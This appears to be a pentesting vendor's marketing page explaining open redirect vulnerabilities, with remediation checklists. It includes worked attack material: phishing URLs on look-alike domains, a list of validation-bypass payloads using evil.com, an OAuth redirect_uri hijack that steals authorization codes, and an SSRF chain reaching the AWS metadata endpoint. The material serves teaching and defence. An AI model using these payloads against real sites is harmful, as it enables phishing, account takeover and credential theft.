Open Redirect Pentesting
Your Domain. Their Phishing Campaign.
Here is the uncomfortable truth about open redirect vulnerabilities: attackers do not need to compromise your server. They just need one unvalidated URL parameter. A link that starts with yoursite.com but ends at their malware distribution page. Your users trust your domain. Attackers exploit that trust. And every redirect parameter you have not validated is an invitation.
Would Your Users Click a Link From Your Own Domain?
Of course they would. That is the whole point. When someone receives an email with a link to yourcompany.com, they do not think twice. Why would they? It is your domain. They know you. They trust you. And that trust is exactly what makes open redirect vulnerabilities so dangerous.
The attack works like this: your application has a redirect parameter somewhere. Maybe it is the ?next= parameter in your login flow. Maybe it is a ?url= in your link shortener or tracking system. Maybe it is buried in an OAuth callback. Somewhere in your application, you take a URL from user input and send browsers there without checking where "there" actually is.
An attacker crafts a URL that looks completely legitimate: https://yourcompany.com/login?next=https://evil-phishing-site.com. They send this to your customers. Your customers see your domain and click. They land on a page that looks just like yours, asking for credentials. Except it is not yours. And now their passwords belong to someone else.
Think your application is immune?
PentestMate's AI agents find these flaws in 87% of the apps we test.
What Our AI Agents Look For
Unlike automated scanners that look for code signatures, our agents understand your business logic and test it like a real attacker would.
Login Redirect Exploitation
HIGHTesting the ?next=, ?redirect=, ?returnUrl= parameters in login flows. Attackers abuse these to redirect users to phishing pages immediately after legitimate authentication.
OAuth Redirect Manipulation
CRITICALOAuth flows rely on redirect URIs. If your validation is weak, attackers can intercept authorization codes by manipulating the redirect_uri parameter. This can lead to full account takeover.
Open Redirect Payloads in Parameters
HIGHWe test various open redirect payloads: protocol-relative URLs (//evil.com), encoded characters (%2f%2f), URL fragments, and parameter pollution to bypass naive validation.
Meta Refresh and JavaScript Redirects
MEDIUMBeyond HTTP 3xx redirects, we test for client-side redirects via meta refresh tags, JavaScript location changes, and window.open calls with user-controlled URLs.
Header Injection Redirects
HIGHTesting whether user input can inject into Location headers through CRLF injection, enabling redirects without dedicated redirect parameters.
Subdomain and Path Bypass
MEDIUMWe test bypasses like yoursite.com.evil.com, yoursite.com@evil.com, and path manipulation to defeat allowlist-based validation that only checks the URL start.
How Open Redirect Payloads Work (And Why Validation Fails)
Most developers think checking if a URL starts with their domain is enough. It is not. Let me show you exactly how attackers craft open redirect payloads to bypass common validation patterns.
The Phishing Gateway: How Trust Becomes a Weapon
What makes open redirect so effective is the psychology. Users have learned to check URLs before clicking. They look for the padlock. They verify the domain. Open redirect passes every test they know because the link genuinely starts with your trusted domain.
# The attack: A "legitimate" link to your login page
# Sent via email, chat, or embedded in a document
https://trusted-bank.com/login?redirect=https://trusted-bank.com.attacker-phishing.net/login
# What the user sees: trusted-bank.com (safe!)
# Where they land: attacker-phishing.net (credential harvesting)
# The phishing page looks identical to the real login
# User enters credentials, attacker captures them
# User is then redirected to the REAL site, none the wiser
# Attacker now has valid credentials for the real siteThe user did everything right. They checked the domain. They looked for HTTPS. They still got phished. Your unvalidated redirect made it possible.
Bypassing Naive URL Validation
Developers often implement validation that checks if the redirect URL starts with their domain or is on an allowlist. These checks are almost always bypassable with the right open redirect payloads. Here is what attackers actually send.
// Common validation attempt:
function validateRedirect(url) {
return url.startsWith("https://mysite.com");
}
// Bypass #1: Subdomain spoofing
validateRedirect("https://mysite.com.evil.com/steal") // TRUE!
// Redirects to: evil.com (which owns the subdomain mysite.com.evil.com)
// Bypass #2: Username in URL (RFC 3986)
validateRedirect("https://mysite.com@evil.com/steal") // TRUE!
// Redirects to: evil.com (mysite.com is parsed as username)
// Bypass #3: Protocol-relative URL bypass
"//evil.com" // Some validators miss this
"%2f%2fevil.com" // URL-encoded version
// Bypass #4: Backslash normalization (browsers normalize \ to /)
"https://mysite.com\@evil.com" // May bypass regex checks
// Bypass #5: Null byte injection (legacy systems)
"https://mysite.com%00.evil.com"
// Bypass #6: Fragment and parameter pollution
"https://mysite.com#@evil.com"
"https://evil.com?https://mysite.com"String matching is not URL validation. Use proper URL parsing libraries and validate the parsed hostname, not the raw string. Every bypass here has been found in production applications.
OAuth Redirect: From Open Redirect to Account Takeover
OAuth depends on redirect_uri to return authorization codes to the right application. If this parameter is not strictly validated, attackers can steal OAuth codes and hijack user sessions. This escalates a simple redirect bug to full account compromise.
// Normal OAuth flow:
1. User clicks "Login with Google" on your site
2. User authorizes access on Google
3. Google redirects to: https://yourapp.com/oauth/callback?code=SECRET_AUTH_CODE
4. Your app exchanges the code for access tokens
// Attack: Manipulate redirect_uri
https://accounts.google.com/oauth/authorize?
client_id=YOUR_CLIENT_ID&
redirect_uri=https://yourapp.com.attacker.com/steal& // Attacker's domain!
response_type=code&
scope=email+profile
// If your app (or Google's validation for your client) accepts this:
1. User authorizes access (they only see "yourapp" requesting permission)
2. Google redirects to: https://yourapp.com.attacker.com/steal?code=SECRET
3. Attacker captures the authorization code
4. Attacker exchanges code for access token
5. Attacker has full access to user's account
// Prevention: OAuth servers should ONLY accept exact redirect_uri matches
// registered in advance. No wildcards. No subdomain matching.This exact attack has been found in major OAuth implementations. In 2016, a researcher found that Microsoft Exchange had an open redirect that could be chained with OAuth to steal credentials. Always use strict redirect_uri validation.
Server-Side Redirect Vulnerabilities
Beyond client-side phishing, open redirects can enable server-side attacks. If your backend follows redirects when fetching URLs (for webhooks, link previews, or image proxying), an attacker can use open redirects to bypass SSRF protections.
// Your application fetches URLs for link previews
async function fetchLinkPreview(url) {
// Security check: only allow trusted domains
const parsed = new URL(url);
if (!["twitter.com", "linkedin.com"].includes(parsed.hostname)) {
throw new Error("Untrusted domain");
}
// Fetch the URL (follows redirects by default!)
const response = await fetch(url, { redirect: "follow" });
return extractPreviewData(response);
}
// Attack: Use an open redirect on a trusted domain
const maliciousUrl = "https://twitter.com/share?url=http://169.254.169.254/latest/meta-data/";
// What happens:
// 1. Validation passes (twitter.com is trusted)
// 2. Twitter redirects to the attacker-controlled URL
// 3. Your server follows the redirect to AWS metadata endpoint
// 4. Attacker receives your AWS credentials in the preview
// This turns open redirect into Server-Side Request Forgery (SSRF)
// Fix: Set redirect: "manual" and validate each hopOpen redirects on third-party sites can compromise YOUR application if you follow redirects to untrusted domains. Always validate the final destination, not just the initial URL.
Still reading? Good. That means you care about security.
Most people would've clicked away by now. Let PentestMate find out if your application has these vulnerabilities - before someone else does.
Stop Reading About Vulnerabilities.
Start Finding Them.
Everything you have read above? Our AI agents test for all of it - automatically, continuously, and without you lifting a finger.
Comprehensive Payload Testing
Our AI agents test hundreds of open redirect payloads across every URL parameter in your application, including encoding variants, protocol manipulation, and parser differential attacks.
Continuous Redirect Monitoring
New features mean new redirect parameters. New redirect parameters mean new attack surface. PentestMate monitors continuously, catching open redirect vulnerabilities the moment they appear.
Real-Time Vulnerability Alerts
When we detect an unvalidated redirect, you get immediate notification with the exact parameter, bypass technique used, and step-by-step remediation guidance.
Start with a $1 trial - full access to all PentestMate AI-powered security testing
Quick Business Logic Security Checklist
Use this as a starting point. If you're missing even one of these, you have a problem.
URL Validation
- Parse URLs with proper libraries, never string matching
- Validate the hostname AFTER parsing, not the raw input
- Use an allowlist of permitted redirect destinations
- Reject URLs with userinfo (user@host) components
- Handle protocol-relative URLs (//) explicitly
Redirect Implementation
- Use relative paths instead of absolute URLs when possible
- Map redirect targets to keys (e.g., ?next=dashboard, not ?next=URL)
- Set short expiration on redirect tokens if used
- Log all redirect destinations for security monitoring
- Return explicit errors for invalid redirect targets
OAuth Security
- Require exact redirect_uri matching, no wildcards
- Pre-register all valid redirect URIs in OAuth config
- Use state parameter to prevent CSRF in OAuth flows
- Validate redirect_uri on BOTH authorization and token endpoints
- Audit third-party OAuth integrations for open redirect risks
Defense in Depth
- Add interstitial warning pages for external redirects
- Set Content-Security-Policy to restrict redirect targets
- Monitor for unusual redirect patterns in analytics
- Include redirect parameter testing in CI/CD security scans
- Train developers on URL parsing vulnerabilities
Not sure if your system passes all these checks? Let PentestMate's AI agents find out for you.
Run Automated Security TestingReal-World Business Logic Breaches
These aren't hypotheticals. These are real companies that got burned by the exact vulnerabilities we've discussed:
Microsoft Exchange (2016)
Attackers could chain this with OAuth flows to steal authentication tokens and gain unauthorized access to user mailboxesWhat happened: Open redirect vulnerability in Exchange Server web interface allowed crafted URLs to redirect users to arbitrary external sites
Lesson: Microsoft addressed this in security bulletin MS16-108. Even enterprise software from major vendors contains open redirect flaws. Regular security testing catches these before attackers do.
How Many Unvalidated Redirects Are Hiding in Your Application?
Every login flow, OAuth callback, and URL parameter is a potential open redirect waiting to be exploited. Our AI agents systematically test every redirect point in your application with hundreds of bypass payloads. They find the validation gaps that turn your trusted domain into a phishing launchpad. Let PentestMate find your open redirect vulnerabilities before attackers use them against your users.
Related Security Tests
Authentication & JWT Pentesting
Learn more
Business Logic Flaws Pentesting
Learn more
Cross-Site Request Forgery (CSRF)
Learn more
Explore more security testing capabilities on our main site.
Back to PentestMate